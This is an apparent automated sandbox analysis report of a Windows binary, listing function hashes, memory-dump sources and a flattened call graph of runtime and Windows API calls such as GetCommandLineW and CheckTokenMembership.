                                                            • API String ID:
                                                            • Opcode ID: 79c898634555427d126ea6dd3cdb717bffa7771ae2a2521c277754591c1f140c
                                                            • Instruction ID: ab01027036ddc27f1a469e73f4ba543d24e73001430df1e18709fa9a17d779b1
                                                            • Opcode Fuzzy Hash: 79c898634555427d126ea6dd3cdb717bffa7771ae2a2521c277754591c1f140c
                                                            • Instruction Fuzzy Hash: DEE10762A0FBC90FE766877858655A87FE0EF57614B0A01FFD099CB0E3D9086D06D392
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9cb3bfc63a26140457761a5e7b8b26787ac2593fe493d75fb603a6759c7ca779
                                                            • Instruction ID: e8eceae73974472e7a19c30e233c011f79f0f2d8ce9f43eaa9b0227d810a35b0
                                                            • Opcode Fuzzy Hash: 9cb3bfc63a26140457761a5e7b8b26787ac2593fe493d75fb603a6759c7ca779
                                                            • Instruction Fuzzy Hash: 17E1B530A09A4D8FDF98EF5CC455AA97BE1FFA8310F1542AAD409D7296CA35EC41C781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e298a5cf0b176762eb33a7a2c799f7e37236dc175ab3faa9cd6ebe14fc53ebb
                                                            • Instruction ID: 3491fe631f7c4449ca534aed5a993e5cd0ba171f1ea658e57080a36b39172479
                                                            • Opcode Fuzzy Hash: 6e298a5cf0b176762eb33a7a2c799f7e37236dc175ab3faa9cd6ebe14fc53ebb
                                                            • Instruction Fuzzy Hash: D8C19130A19A4D8FDF94EF9CC451AA9BBF1FFA8300F15426AD41DD7295CA35E881CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:11.5%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:7.1%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:26
17926->17927 17931 41c27a 17926->17931 17961 41d507 17927->17961 17929 41f507 17983 41f32d 17929->17983 17932 41f859 GetEnvironmentStringsW 17931->17932 17933 41f870 17932->17933 17943 41f8c3 17932->17943 17936 41f876 WideCharToMultiByte 17933->17936 17934 41c27f 17934->17915 17944 41c2ba 17934->17944 17935 41f8cc FreeEnvironmentStringsW 17935->17934 17937 41f892 17936->17937 17936->17943 17938 41dfac __strnicoll 21 API calls 17937->17938 17939 41f898 17938->17939 17940 41f8b5 17939->17940 17941 41f89f WideCharToMultiByte 17939->17941 17942 41d8ba _free 20 API calls 17940->17942 17941->17940 17942->17943 17943->17934 17943->17935 17945 41c2cf 17944->17945 17946 41d85d __strnicoll 20 API calls 17945->17946 17956 41c2f6 17946->17956 17947 41c35a 17948 41d8ba _free 20 API calls 17947->17948 17949 41c290 17948->17949 17949->17914 17950 41d85d __strnicoll 20 API calls 17950->17956 17951 41c35c 18213 41c38b 17951->18213 17955 41d8ba _free 20 API calls 17955->17947 17956->17947 17956->17950 17956->17951 17957 41c37e 17956->17957 17959 41d8ba _free 20 API calls 17956->17959 18204 41ba51 17956->18204 17958 41cf16 __strnicoll 11 API calls 17957->17958 17960 41c38a 17958->17960 17959->17956 17962 41d512 17961->17962 17963 41d518 17961->17963 17964 41dc5a __strnicoll 11 API calls 17962->17964 17965 41dcb0 __strnicoll 11 API calls 17963->17965 17968 41d51e 17963->17968 17964->17963 17966 41d532 17965->17966 17967 41d85d __strnicoll 20 API calls 17966->17967 17966->17968 17969 41d542 17967->17969 17968->17929 17970 41d54a 17969->17970 17971 41d55f 17969->17971 17973 41dcb0 __strnicoll 11 API calls 17970->17973 17972 41dcb0 __strnicoll 11 API calls 17971->17972 17974 41d56b 17972->17974 17975 41d556 17973->17975 17976 41d56f 17974->17976 17977 41d57e 17974->17977 17980 41d8ba _free 20 API calls 17975->17980 17978 41dcb0 __strnicoll 11 API calls 17976->17978 17979 41d27d __strnicoll 20 API calls 17977->17979 17978->17975 17981 41d589 17979->17981 17980->17968 17982 41d8ba _free 20 
API calls 17981->17982 17982->17968 18001 41f448 17983->18001 17985 41f340 18007 41f0c1 17985->18007 17988 41f359 17988->17931 17993 41d8ba _free 20 API calls 17993->17988 17994 41f397 17995 41cfc3 __strnicoll 20 API calls 17994->17995 17997 41f39c 17995->17997 17996 41f3b4 17998 41f3e0 17996->17998 17999 41d8ba _free 20 API calls 17996->17999 17997->17993 17998->17997 18032 41efbd 17998->18032 17999->17998 18005 41f454 BuildCatchObjectHelperInternal 18001->18005 18003 41f4d3 __onexit 18003->17985 18005->18003 18006 41d8ba _free 20 API calls 18005->18006 18040 41d7fe EnterCriticalSection 18005->18040 18041 41f4ca 18005->18041 18006->18005 18045 41aff9 18007->18045 18010 41f0e2 GetOEMCP 18012 41f10b 18010->18012 18011 41f0f4 18011->18012 18013 41f0f9 GetACP 18011->18013 18012->17988 18014 41dfac 18012->18014 18013->18012 18015 41dfea 18014->18015 18020 41dfba __strnicoll 18014->18020 18017 41cfc3 __strnicoll 20 API calls 18015->18017 18016 41dfd5 RtlAllocateHeap 18018 41dfe8 18016->18018 18016->18020 18017->18018 18018->17997 18021 41f536 18018->18021 18019 41b5da __strnicoll 7 API calls 18019->18020 18020->18015 18020->18016 18020->18019 18022 41f0c1 25 API calls 18021->18022 18023 41f555 18022->18023 18026 41f5b3 IsValidCodePage 18023->18026 18027 41f5a5 GetACP 18023->18027 18029 41f55f 18023->18029 18031 41f5d8 ___scrt_fastfail 18023->18031 18024 41a167 CatchGuardHandler 5 API calls 18025 41f38f 18024->18025 18025->17994 18025->17996 18028 41f5c5 GetCPInfo 18026->18028 18026->18029 18027->18026 18027->18029 18028->18029 18028->18031 18029->18024 18110 41f199 GetCPInfo 18031->18110 18033 41efc9 BuildCatchObjectHelperInternal 18032->18033 18178 41d7fe EnterCriticalSection 18033->18178 18035 41efd3 18179 41f000 18035->18179 18039 41efec __onexit 18039->17997 18040->18005 18044 41d846 LeaveCriticalSection 18041->18044 18043 41f4d1 18043->18005 18044->18043 18046 41b016 18045->18046 18052 41b00c 18045->18052 18046->18052 18053 41d453 GetLastError 18046->18053 18048 
41b037 18079 41d69a 18048->18079 18052->18010 18052->18011 18054 41d46f 18053->18054 18055 41d469 18053->18055 18057 41dcb0 __strnicoll 11 API calls 18054->18057 18078 41d475 18054->18078 18056 41dc5a __strnicoll 11 API calls 18055->18056 18056->18054 18058 41d489 18057->18058 18059 41d4fa SetLastError 18058->18059 18062 41d85d __strnicoll 20 API calls 18058->18062 18060 41d506 18059->18060 18061 41d47a 18061->18059 18064 41d499 18062->18064 18063 41d4ee SetLastError 18063->18048 18065 41d4a1 18064->18065 18066 41d4b6 18064->18066 18067 41dcb0 __strnicoll 11 API calls 18065->18067 18068 41dcb0 __strnicoll 11 API calls 18066->18068 18075 41d4ad 18067->18075 18069 41d4c2 18068->18069 18070 41d4d5 18069->18070 18071 41d4c6 18069->18071 18074 41d27d __strnicoll 20 API calls 18070->18074 18073 41dcb0 __strnicoll 11 API calls 18071->18073 18072 41d8ba _free 20 API calls 18072->18061 18073->18075 18076 41d4e0 18074->18076 18075->18072 18077 41d8ba _free 20 API calls 18076->18077 18077->18078 18078->18059 18078->18061 18078->18063 18080 41b050 18079->18080 18081 41d6ad 18079->18081 18083 41d6c7 18080->18083 18081->18080 18087 420912 18081->18087 18084 41d6ef 18083->18084 18085 41d6da 18083->18085 18084->18052 18085->18084 18105 41f523 18085->18105 18088 42091e BuildCatchObjectHelperInternal 18087->18088 18089 41d453 pre_c_initialization 23 API calls 18088->18089 18090 420927 18089->18090 18096 42096c __onexit 18090->18096 18097 41d7fe EnterCriticalSection 18090->18097 18092 420945 18098 420989 18092->18098 18096->18080 18097->18092 18099 420997 __strnicoll 18098->18099 18101 420959 18098->18101 18100 4206c5 __strnicoll 20 API calls 18099->18100 18099->18101 18100->18101 18102 420978 18101->18102 18103 41d846 FindHandlerForForeignException LeaveCriticalSection 18102->18103 18104 42097f 18103->18104 18104->18096 18106 41d453 pre_c_initialization 23 API calls 18105->18106 18107 41f52d 18106->18107 18108 41f448 __strnicoll 20 API calls 18107->18108 18109 41f533 18108->18109 
18109->18084 18111 41f27d 18110->18111 18116 41f1d3 18110->18116 18113 41a167 CatchGuardHandler 5 API calls 18111->18113 18115 41f329 18113->18115 18115->18029 18120 420524 18116->18120 18119 421174 __strnicoll 28 API calls 18119->18111 18121 41aff9 __strnicoll 23 API calls 18120->18121 18122 420544 MultiByteToWideChar 18121->18122 18125 42057d 18122->18125 18130 420601 18122->18130 18124 41a167 CatchGuardHandler 5 API calls 18127 41f234 18124->18127 18126 41dfac __strnicoll 21 API calls 18125->18126 18131 420595 __strnicoll ___scrt_fastfail 18125->18131 18126->18131 18134 421174 18127->18134 18128 4205fb 18139 420628 18128->18139 18130->18124 18131->18128 18132 4205d1 MultiByteToWideChar 18131->18132 18132->18128 18133 4205eb GetStringTypeW 18132->18133 18133->18128 18135 41aff9 __strnicoll 23 API calls 18134->18135 18136 421187 18135->18136 18143 420f8e 18136->18143 18140 420645 18139->18140 18141 420634 18139->18141 18140->18130 18141->18140 18142 41d8ba _free 20 API calls 18141->18142 18142->18140 18144 420fa9 __strnicoll 18143->18144 18145 420fcf MultiByteToWideChar 18144->18145 18146 420ffb 18145->18146 18147 42114c 18145->18147 18150 41dfac __strnicoll 21 API calls 18146->18150 18154 421010 __strnicoll 18146->18154 18148 41a167 CatchGuardHandler 5 API calls 18147->18148 18149 41f255 18148->18149 18149->18119 18150->18154 18151 4210b3 18156 420628 __freea 20 API calls 18151->18156 18152 421048 MultiByteToWideChar 18152->18151 18153 42105f 18152->18153 18170 41dd6b 18153->18170 18154->18151 18154->18152 18156->18147 18158 4210c2 18162 41dfac __strnicoll 21 API calls 18158->18162 18165 4210d4 __strnicoll 18158->18165 18159 42108a 18159->18151 18160 41dd6b __strnicoll 11 API calls 18159->18160 18160->18151 18161 42113d 18164 420628 __freea 20 API calls 18161->18164 18162->18165 18163 41dd6b __strnicoll 11 API calls 18166 42111c 18163->18166 18164->18151 18165->18161 18165->18163 18166->18161 18167 42112b WideCharToMultiByte 18166->18167 18167->18161 18168 42116b 
18167->18168 18169 420628 __freea 20 API calls 18168->18169 18169->18151 18171 41d90e __strnicoll 5 API calls 18170->18171 18172 41dd81 18171->18172 18173 41dddf __strnicoll 10 API calls 18172->18173 18175 41dd87 18172->18175 18174 41ddc7 LCMapStringW 18173->18174 18174->18175 18176 41a167 CatchGuardHandler 5 API calls 18175->18176 18177 41ddd9 18176->18177 18177->18151 18177->18158 18177->18159 18178->18035 18189 41f730 18179->18189 18181 41f022 18182 41f730 26 API calls 18181->18182 18183 41f041 18182->18183 18184 41d8ba _free 20 API calls 18183->18184 18185 41efe0 18183->18185 18184->18185 18186 41eff4 18185->18186 18203 41d846 LeaveCriticalSection 18186->18203 18188 41effe 18188->18039 18190 41f741 18189->18190 18194 41f73d 18189->18194 18191 41f748 18190->18191 18196 41f75b ___scrt_fastfail 18190->18196 18192 41cfc3 __strnicoll 20 API calls 18191->18192 18193 41f74d 18192->18193 18195 41cf06 __strnicoll 26 API calls 18193->18195 18194->18181 18195->18194 18196->18194 18197 41f792 18196->18197 18198 41f789 18196->18198 18197->18194 18201 41cfc3 __strnicoll 20 API calls 18197->18201 18199 41cfc3 __strnicoll 20 API calls 18198->18199 18200 41f78e 18199->18200 18202 41cf06 __strnicoll 26 API calls 18200->18202 18201->18200 18202->18194 18203->18188 18205 41ba6c 18204->18205 18206 41ba5e 18204->18206 18207 41cfc3 __strnicoll 20 API calls 18205->18207 18206->18205 18211 41ba83 18206->18211 18208 41ba74 18207->18208 18209 41cf06 __strnicoll 26 API calls 18208->18209 18210 41ba7e 18209->18210 18210->17956 18211->18210 18212 41cfc3 __strnicoll 20 API calls 18211->18212 18212->18208 18217 41c398 18213->18217 18218 41c362 18213->18218 18214 41c3af 18216 41d8ba _free 20 API calls 18214->18216 18215 41d8ba _free 20 API calls 18215->18217 18216->18218 18217->18214 18217->18215 18218->17955 18521 41b670 18219->18521 18221 4066e5 GetTickCount 18222 4066fb 18221->18222 18271 4066f3 18221->18271 18223 406700 GetVersionExW 18222->18223 18224 40761c MessageBoxA 18223->18224 18225 
40671f 18223->18225 18224->18271 18225->18224 18226 406739 18225->18226 18527 4114a2 18226->18527 18229 4114a2 22 API calls 18230 40675a 18229->18230 18231 4114a2 22 API calls 18230->18231 18232 406762 18231->18232 18530 406390 LoadLibraryA #17 18232->18530 18238 406784 18563 405174 18238->18563 18240 40678d 18575 40575f 18240->18575 18242 4067a3 18592 404435 18242->18592 18245 40575f 22 API calls 18246 4067b7 GetCommandLineW 18245->18246 18247 40575f 22 API calls 18246->18247 18248 4067c8 18247->18248 18595 404031 18248->18595 18250 4067e4 wsprintfW 18251 4067f4 18250->18251 18252 40575f 22 API calls 18251->18252 18253 40680b 18252->18253 18600 405c24 18253->18600 18256 405c24 3 API calls 18258 406862 18256->18258 18260 406874 18258->18260 18261 406868 18258->18261 18259 40682e 18259->18256 18263 405c24 3 API calls 18260->18263 18862 40648f 18261->18862 18264 40687f 18263->18264 18265 406892 18264->18265 18266 406885 18264->18266 18268 405c24 3 API calls 18265->18268 18878 401e60 18266->18878 18269 4068a2 18268->18269 18270 404031 22 API calls 18269->18270 18272 4068bf GetModuleFileNameW 18270->18272 18271->17575 18273 4068cb 18272->18273 18274 4068dc 18272->18274 18886 409afd 18273->18886 18276 405c24 3 API calls 18274->18276 18287 406900 18276->18287 18277 406ac4 18605 41156d 18277->18605 18279 406ad3 18280 41156d 22 API calls 18279->18280 18282 406ae2 18280->18282 18281 405c24 3 API calls 18292 406a5a 18281->18292 18283 406b72 18282->18283 18286 4115d4 22 API calls 18282->18286 18285 404435 2 API calls 18283->18285 18284 41b120 30 API calls 18288 406a0c 18284->18288 18289 406b93 18285->18289 18290 406b1f 18286->18290 18287->18271 18287->18277 18287->18288 18291 4069e0 18287->18291 18295 4018e1 RaiseException 18287->18295 18288->18281 18293 4115d4 22 API calls 18289->18293 18294 4115d4 22 API calls 18290->18294 18291->18271 18291->18284 18291->18288 18292->18277 18297 404cf6 RaiseException 18292->18297 18296 406b9e 18293->18296 18303 406b37 18294->18303 
18295->18287 18609 401468 18296->18609 18299 406aa9 18297->18299 18299->18277 18304 41156d 22 API calls 18299->18304 18301 406bb2 18307 409afd 61 API calls 18301->18307 18302 406bcc 18615 41134d 18302->18615 18305 41156d 22 API calls 18303->18305 18304->18277 18308 406b62 18305->18308 18307->18271 18900 4041e0 18308->18900 18309 406bd4 18618 4049cf 18309->18618 18314 406bee 18314->18271 18315 406c83 18314->18315 18316 405c24 3 API calls 18314->18316 18315->18271 18318 406cd5 18315->18318 18319 406c9d wsprintfW 18315->18319 18325 40575f 22 API calls 18315->18325 18317 406c11 18316->18317 18317->18315 18323 406c19 18317->18323 18632 406080 18318->18632 18321 4041e0 46 API calls 18319->18321 18321->18315 18323->18271 18927 405f70 18323->18927 18325->18315 18326 406ce7 18326->18271 18667 4060a2 18326->18667 18332 409afd 61 API calls 18332->18271 18333 406d04 18334 4049cf 79 API calls 18333->18334 18335 406d1b 18334->18335 18336 4060a2 48 API calls 18335->18336 18337 406d23 18336->18337 18740 40149d 18337->18740 18339 406d2a 18340 40197d 75 API calls 18339->18340 18341 406d2f 18340->18341 18342 4060a2 48 API calls 18341->18342 18343 406d34 18342->18343 18344 406e72 18343->18344 18950 40493f AllocateAndInitializeSid 18343->18950 18756 40476f 18344->18756 18348 406d58 18350 4114a2 22 API calls 18348->18350 18351 406d60 18350->18351 18353 4114a2 22 API calls 18351->18353 18355 406d68 GetCommandLineW 18353->18355 18358 404cf6 RaiseException 18355->18358 18356 406f07 18360 40476f lstrcmpW 18356->18360 18357 406f68 CoInitialize 18363 40476f lstrcmpW 18357->18363 18362 406d78 18358->18362 18364 406f12 18360->18364 18361 406edb 18763 406323 18361->18763 18366 41146b 22 API calls 18362->18366 18367 406f8c 18363->18367 18368 406f21 18364->18368 18369 4041e0 46 API calls 18364->18369 18365 40575f 22 API calls 18370 406e84 18365->18370 18372 406d83 18366->18372 18373 406f9f 18367->18373 18377 4115d4 22 API calls 18367->18377 18982 407c4c 18368->18982 18369->18368 18370->18361 
18370->18365 18378 40476f lstrcmpW 18370->18378 18759 41146b 18370->18759 18953 4116a4 18372->18953 18769 405f17 18373->18769 18377->18373 18378->18370 18382 40476f lstrcmpW 18384 406fb7 18382->18384 18386 406fc4 18384->18386 18388 41b120 30 API calls 18384->18388 18389 406fd3 18386->18389 18390 406fdd 18386->18390 18387 41167f 22 API calls 18391 406dbf 18387->18391 18388->18386 18997 409fe5 18389->18997 18394 406ff0 18390->18394 18395 406fe6 18390->18395 18961 41136f 18391->18961 18397 406dd0 18522 41b67c BuildCatchObjectHelperInternal 18521->18522 19210 41d7fe EnterCriticalSection 18522->19210 18524 41b687 pre_c_initialization 19211 41b6c7 18524->19211 18526 41b6bc __onexit 18526->18221 19215 419930 18527->19215 18531 4063b7 18530->18531 19235 40478c 18531->19235 18533 4063bc 18534 4041e0 46 API calls 18533->18534 18535 4063c3 18534->18535 18536 4041e0 46 API calls 18535->18536 18537 4063cf 18536->18537 18538 4041e0 46 API calls 18537->18538 18539 4063db 18538->18539 18540 4041e0 46 API calls 18539->18540 18541 4063e7 18540->18541 18542 4041e0 46 API calls 18541->18542 18543 4063f3 18542->18543 18544 4041e0 46 API calls 18543->18544 18545 4063ff 18544->18545 18546 4041e0 46 API calls 18545->18546 18552 40640b 18546->18552 18547 406423 SHGetSpecialFolderPathW 18548 406437 wsprintfW 18547->18548 18547->18552 18549 40575f 22 API calls 18548->18549 18549->18552 18550 40648a GetCommandLineW 18553 404cf6 18550->18553 18551 40575f 22 API calls 18551->18552 18552->18547 18552->18550 18552->18551 18555 404d0c 18553->18555 18556 404d4b 18553->18556 18554 404d3b 18559 4115d4 18554->18559 18555->18554 18557 4018e1 RaiseException 18555->18557 18556->18554 18558 4018e1 RaiseException 18556->18558 18557->18555 18558->18556 18560 4115e4 18559->18560 18561 419930 22 API calls 18560->18561 18562 411603 18560->18562 18561->18562 18562->18238 18564 4114a2 22 API calls 18563->18564 18574 405183 18564->18574 18565 41156d 22 API calls 18566 40528a 18565->18566 18566->18240 18567 4018e1 
RaiseException 18567->18574 18568 40527c 18568->18565 18570 4114a2 22 API calls 18570->18574 18572 41156d 22 API calls 18572->18574 18574->18567 18574->18568 18574->18570 18574->18572 19242 41132c 18574->19242 19245 40582b 18574->19245 19251 411734 18574->19251 18576 4114a2 22 API calls 18575->18576 18577 40576d 18576->18577 18578 4114a2 22 API calls 18577->18578 18579 405775 18578->18579 18580 4115d4 22 API calls 18579->18580 18581 405780 18580->18581 18582 4115d4 22 API calls 18581->18582 18583 40578b 18582->18583 19265 4027db 18583->19265 18586 41146b 22 API calls 18587 4057ac 18586->18587 18589 411772 RaiseException 18587->18589 18588 4057c4 18588->18242 18590 4057b7 18589->18590 18591 40575f 22 API calls 18590->18591 18591->18588 19294 40440a GetProcAddress 18592->19294 18594 40443a 18594->18245 18596 41143a 22 API calls 18595->18596 18597 404045 18596->18597 18599 40405b 18597->18599 19297 411a4b 18597->19297 18599->18250 18601 405c39 18600->18601 18602 405c6b lstrlenW lstrlenW 18601->18602 18603 405c8c 18601->18603 19304 404e1f 18602->19304 18603->18259 18859 41b120 18603->18859 18606 41157b 18605->18606 18608 41159b 18605->18608 18607 419930 22 API calls 18606->18607 18606->18608 18607->18608 18608->18279 18610 401473 18609->18610 18613 401492 18610->18613 19316 4105ec 18610->19316 18613->18301 18613->18302 18616 419930 22 API calls 18615->18616 18617 41135a 18616->18617 18617->18309 18619 41134d 22 API calls 18618->18619 18620 4049df 18619->18620 18631 4105ec 3 API calls 18620->18631 18621 4049ee 19347 404a4a 18621->19347 18623 4049f8 18624 404a11 18623->18624 18626 404a03 18623->18626 18625 404a20 18624->18625 19378 40444d 18624->19378 18628 404a0b 18625->18628 19396 4114c6 18625->19396 18629 409afd 61 API calls 18626->18629 18628->18314 18629->18628 18631->18621 18633 4115d4 22 API calls 18632->18633 18634 406093 18633->18634 18635 411772 RaiseException 18634->18635 18636 40609d 18635->18636 18637 40197d 18636->18637 18638 4114a2 22 API calls 
18637->18638 18639 401994 lstrlenW 18638->18639 18654 4019b3 18639->18654 18640 41146b 22 API calls 18642 401cc0 18640->18642 18641 40575f 22 API calls 18643 401d16 18641->18643 19531 4113b5 18642->19531 18645 41146b 22 API calls 18643->18645 18647 401d22 18645->18647 18646 401cd1 18648 4115d4 22 API calls 18646->18648 18649 4113b5 22 API calls 18647->18649 18653 401cdc 18648->18653 18651 401d36 18649->18651 18652 4115d4 22 API calls 18651->18652 18655 401d41 18652->18655 18653->18641 18656 404995 33 API calls 18654->18656 18657 41b120 30 API calls 18654->18657 18662 401c59 18654->18662 18665 401c94 18654->18665 18666 401c5f 18654->18666 19506 401914 18654->19506 18655->18326 18656->18654 18657->18654 18658 4114a2 22 API calls 18659 401c7c 18658->18659 18660 404cf6 RaiseException 18659->18660 18661 401c89 18660->18661 19528 40183b 18661->19528 19517 401d75 18662->19517 18665->18640 18665->18653 18666->18655 18666->18658 18666->18665 18668 40476f lstrcmpW 18667->18668 18669 4060b5 18668->18669 18670 406102 18669->18670 18671 4115d4 22 API calls 18669->18671 18672 40476f lstrcmpW 18670->18672 18673 4060cb 18671->18673 18674 40611e 18672->18674 18675 4041e0 46 API calls 18673->18675 18676 40476f lstrcmpW 18674->18676 18678 4060d2 18675->18678 18677 40613a 18676->18677 18679 40476f lstrcmpW 18677->18679 18680 411772 RaiseException 18678->18680 18681 406156 18679->18681 18682 4060db 18680->18682 18683 40476f lstrcmpW 18681->18683 18684 4115d4 22 API calls 18682->18684 18685 406172 18683->18685 18686 4060f2 18684->18686 18687 406199 18685->18687 18688 40617c lstrcmpiW 18685->18688 18689 4041e0 46 API calls 18686->18689 18690 40476f lstrcmpW 18687->18690 18688->18687 18691 4060f9 18689->18691 18692 4061a4 18690->18692 18693 411772 RaiseException 18691->18693 18694 40476f lstrcmpW 18692->18694 18693->18670 18695 4061c8 18694->18695 18696 4061d4 18695->18696 19558 40665d 18695->19558 18697 40476f lstrcmpW 18696->18697 18702 4061e7 18697->18702 18699 406205 18701 40476f 
lstrcmpW 18699->18701 18708 406217 18701->18708 18702->18699 18703 40476f lstrcmpW 18702->18703 19562 4065fa 18702->19562 18703->18702 18704 406235 18705 40476f lstrcmpW 18704->18705 18707 406240 18705->18707 18710 40476f lstrcmpW 18707->18710 18708->18704 18709 40476f lstrcmpW 18708->18709 19566 40662c 18708->19566 18709->18708 18711 406250 18710->18711 18712 40476f lstrcmpW 18711->18712 18713 406260 18712->18713 18714 40626d 18713->18714 18715 41b120 30 API calls 18713->18715 18716 40476f lstrcmpW 18714->18716 18715->18714 18717 40627e 18716->18717 18718 40628a 18717->18718 18719 41b120 30 API calls 18717->18719 18720 40476f lstrcmpW 18718->18720 18719->18718 18721 40629b 18720->18721 18722 40476f lstrcmpW 18721->18722 18723 4062b7 18722->18723 18724 40476f lstrcmpW 18723->18724 18725 4062d3 18724->18725 18726 40476f lstrcmpW 18725->18726 18727 4062ef 18726->18727 18728 40476f lstrcmpW 18727->18728 18729 40630b 18728->18729 18730 40631b 18729->18730 18731 4041e0 46 API calls 18729->18731 18732 4015a9 18730->18732 18731->18730 18733 4015b1 18732->18733 18734 4198f2 22 API calls 18733->18734 18737 4015f9 18733->18737 18735 4015bd 18734->18735 18738 4105ec 3 API calls 18735->18738 18736 4015e7 19574 40c9f9 18736->19574 18737->18333 18738->18736 18741 401589 collate 18740->18741 18742 4014b8 18740->18742 18741->18339 18742->18741 18743 4015a9 27 API calls 18742->18743 18744 4014ca 18743->18744 18744->18741 18745 419930 22 API calls 18744->18745 18746 4014f0 18745->18746 18746->18741 18748 40151a 18746->18748 19598 407aa0 18746->19598 18748->18741 18749 4198f2 22 API calls 18748->18749 18750 401528 18749->18750 18751 401538 18750->18751 19603 401180 18750->19603 18753 401544 GetTickCount 18751->18753 18754 401534 18751->18754 18755 401563 collate 18753->18755 18754->18751 18754->18753 18755->18741 18757 4040b5 lstrcmpW 18756->18757 18758 40477d 18757->18758 18758->18370 18760 41147a 18759->18760 18761 411ca9 22 API calls 18760->18761 18762 411485 18761->18762 
18762->18370 18764 406377 18763->18764 18768 406334 18763->18768 18764->18356 18764->18357 18765 41143a 22 API calls 18765->18768 18768->18764 18768->18765 19639 405f4e 18768->19639 18770 403e7d 24 API calls 18769->18770 18771 405f24 18770->18771 18772 4053c8 22 API calls 18771->18772 18773 405f31 18772->18773 18774 40530d 22 API calls 18773->18774 18775 405f3c 18774->18775 18776 40553e 22 API calls 18775->18776 18777 405f42 18776->18777 18778 403e7d 24 API calls 18777->18778 18779 405f48 18778->18779 18779->18382 20365 41a918 18859->20365 18863 407c4c 24 API calls 18862->18863 18864 4064ab 18863->18864 18865 4041e0 46 API calls 18864->18865 18866 4064b9 18865->18866 18867 41146b 22 API calls 18866->18867 18868 4064c3 18867->18868 18869 4064f9 wsprintfW 18868->18869 18871 411772 RaiseException 18868->18871 20401 4117b3 18868->20401 18870 411772 RaiseException 18869->18870 18873 40652d 18870->18873 18871->18868 18874 411772 RaiseException 18873->18874 18875 40653a 18874->18875 18876 409c48 24 API calls 18875->18876 18877 40654f 18876->18877 18877->18271 18879 401e70 18878->18879 18885 401e87 18878->18885 18884 41b120 30 API calls 18879->18884 18879->18885 18880 4025a9 27 API calls 18881 401ec8 18880->18881 18882 401ed1 GetLastError 18881->18882 18883 401ed8 18881->18883 18882->18883 18883->18271 18884->18885 18885->18880 18887 4041e0 46 API calls 18886->18887 18888 409b11 wvsprintfW 18887->18888 18889 409b31 GetLastError FormatMessageW 18888->18889 18890 409be4 18888->18890 18891 409b76 lstrlenW lstrlenW 18889->18891 18892 409b5f FormatMessageW 18889->18892 18893 409e22 28 API calls 18890->18893 18894 419930 22 API calls 18891->18894 18892->18890 18892->18891 18896 409bf0 18893->18896 18895 409ba5 lstrcpyW lstrcpyW 18894->18895 20405 409e22 18895->20405 18896->18271 18898 409bd1 18899 409bd7 LocalFree 18898->18899 18899->18896 18901 4041f6 18900->18901 18902 404220 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 18901->18902 18906 404216 18901->18906 
18903 4042ca SetLastError 18902->18903 18904 40425b 18902->18904 18905 4042e1 18903->18905 18903->18906 18907 419930 22 API calls 18904->18907 18908 404302 lstrlenA 18905->18908 18910 40478c 3 API calls 18905->18910 18923 411772 18906->18923 18909 40426f GetEnvironmentVariableW 18907->18909 18912 419930 22 API calls 18908->18912 18911 404287 GetLastError 18909->18911 18921 4042a3 collate 18909->18921 18913 4042f4 18910->18913 18914 40428d 18911->18914 18911->18921 18915 404323 18912->18915 18913->18908 18916 404297 lstrcmpiW 18914->18916 18914->18921 18917 404335 GetLocaleInfoW 18915->18917 18918 404379 MultiByteToWideChar 18915->18918 18916->18921 18919 404368 18917->18919 18920 40435c 18917->18920 18918->18906 18919->18918 18922 41b120 30 API calls 18920->18922 18921->18903 18922->18919 18924 411781 18923->18924 18925 4118be RaiseException 18924->18925 18926 41178c 18925->18926 18926->18283 20413 410130 18927->20413 18930 41134d 22 API calls 18932 40600c 18930->18932 18931 41146b 22 API calls 18936 405fad 18931->18936 18933 411516 22 API calls 18932->18933 18934 406019 18933->18934 18935 4116fa 22 API calls 18934->18935 18937 406026 18935->18937 18938 403769 87 API calls 18936->18938 18941 406053 18936->18941 18939 4116fa 22 API calls 18937->18939 18940 405fd5 18938->18940 18942 406033 18939->18942 18940->18941 18943 410130 2 API calls 18940->18943 18944 4100dc CloseHandle 18941->18944 18945 4116fa 22 API calls 18942->18945 18949 405ff3 18943->18949 18946 406075 18944->18946 18947 406040 18945->18947 18946->18271 18946->18332 20416 4106ea 18947->20416 18949->18930 18949->18941 18951 404992 18950->18951 18952 404978 CheckTokenMembership FreeSid 18950->18952 18951->18344 18951->18348 18952->18951 18954 4116b7 18953->18954 20432 4113f0 18954->20432 18956 406d9f 18957 41167f 18956->18957 18958 41168a 18957->18958 18959 4113f0 22 API calls 18958->18959 18960 406daf 18959->18960 18960->18387 18962 411ca9 22 API calls 18961->18962 18963 411388 18962->18963 18963->18397 
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 004066E6
                                                            • GetVersionExW.KERNEL32(?), ref: 00406711
                                                            • GetCommandLineW.KERNEL32(?), ref: 00406771
                                                            • GetCommandLineW.KERNEL32(00000001,?,?,?,?,00000000), ref: 004067BB
                                                            • wsprintfW.USER32 ref: 004067E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
